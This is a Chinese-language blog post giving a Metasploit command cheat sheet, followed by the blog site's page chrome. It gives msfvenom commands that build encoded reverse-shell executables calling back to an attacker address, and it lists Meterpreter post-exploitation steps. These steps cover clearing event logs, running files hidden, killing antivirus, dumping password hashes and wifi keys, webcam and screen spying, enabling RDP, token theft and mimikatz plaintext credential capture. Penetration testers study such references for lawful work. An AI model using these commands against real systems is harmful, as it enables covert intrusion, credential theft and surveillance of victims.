Metasploit(最全命令讲解)

文件目录
data目录(msf用于一些可以编辑的文件)
documentation目录(msf相关文档,工具介绍)
lib目录(静态链接库,msf中的一些代码)
modules目录(msf模块)
tools目录(msf小工具模块)
基础使用
msfdb init:初始化,并启动数据库
msfconsole:开启msf
db_status:查看msf数据库状态
可以使用kage实现界面化
help:查看帮助
exit:退出msf
show:进行罗列模块
search:搜索模块
use:使用模块
back:返回上一级
info:查看模块信息
show options:查看配置
set:设置一个值
exploit:执行模块
jobs:查看后台工作
kill:杀死工作
threads:线程(例如设置10个线程 set threads 10)
消息收集
arp扫描:auxiliary/scanner/discovery/arp_sweep
udp扫描:auxiliary/scanner/discovery/udp_sweep
端口扫描:auxiliary/scanner/portscan/tcp
exploit
永恒之蓝(17-010)
msfvenom
常用参数
msfvenom -l:查看列表
msfvenom -p:指定payload
msfvenom -f:指定输出格式
msfvenom -e:指定编码方式
msfvenom -i:指定编码次数
windowsDemo:msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.174.129 LPORT=4444
-e x86/shikata_ga_nai -i 5 -f exe > 1.exe
linuxDemo: msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.174.129 LPORT=4444
-f elf > 1.elf (linux中可执行文件后缀为.elf)
Meterpreter
基础操作
background:返回
sessions -l:查看所有会话信息
sessions -i id号:与指定的会话进行交互(id号为存在的会话 输入哪个id就可以切换到哪个会话状态下)
pwd:查看目标当前目录
lpwd:查看本地当前目录
cd:切换到目标的指定目录
lcd:切换到本地指定目录(l为localhost)
ls:列出目标的文件
lls:列出本机当前的文件
clearev:清理痕迹
download 目标文件名:将目标文件下载到本地
upload 目标文件名:将文件上传到目标
execute 参数:在目标执行命令的功能(-h功能查看有哪些参数)
execute -f 文件名(例:1.exe) -H:不显示执行情况,创建一个进程(在目标文件上执行文件,隐藏执行)
ps:列出目标进程
getuid:查看当前用户的身份
getprivs:查看当前用户的权限
migrate 进程号:进程迁移命令(权限就会成为该进程号的权限)
getpid:查看木马进程
shell:进入终端环境
(1)chcp 65001:更改编码,防止乱码(前提是进入终端环境后执行该命令)
exit:退出终端环境
idletime:查看目标服务器空闲时间
sysinfo:查看目标信息
kill pid号:杀死目标的一个进程
shutdown:关机
reboot:重启
netstat:查看网络连接情况
getsystem:尝试提权(一般低版本才可以成功,高版本需要配合其他才能成功)
信息收集 (大部分使用 run 运行)
模块学习,可以罗列出来选择需要的模块使用
run killav:杀死杀毒软件(了解一下就行)
run hashdump:导出目标机的密码
run post/windows/wlan/wlan_profile:查看wifi密码
run vnc:实时屏幕监控
run webcam:开启一个摄像头
run post/windows/gather/checkvm:查看当前主机是否为虚拟机
run post/windows/gather/enum_computers:枚举域内的主机
run post/windows/manage/enable_rdp:开启目标的3389
run getgui -e:连接对方远程桌面
help:各种命令罗列
incognito (令牌窃取工具)
load incognito:加载incognito工具
list_tokens -u:列出可以模拟的令牌
impersonate_token 令牌名:窃取一个指定令牌(令牌名例如:ROOT-5DE52AC98B\\Administrator,需要加俩
个\,若令牌名之间有空格,可以加"",将令牌名写入,可以试一试,不一定成功)
mimikatz
load mimikatz:加载该工具
wdigest:抓取明文密码
msf 图形化界面
msfdb init:开启数据库
armitage:启用图形化界面
msf 更新
apt update;apt install metasploit-framework:更新
手动加入一些插件去exploitdb:网址https://www.exploit-db.com/

  • 12
    点赞
  • 9
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值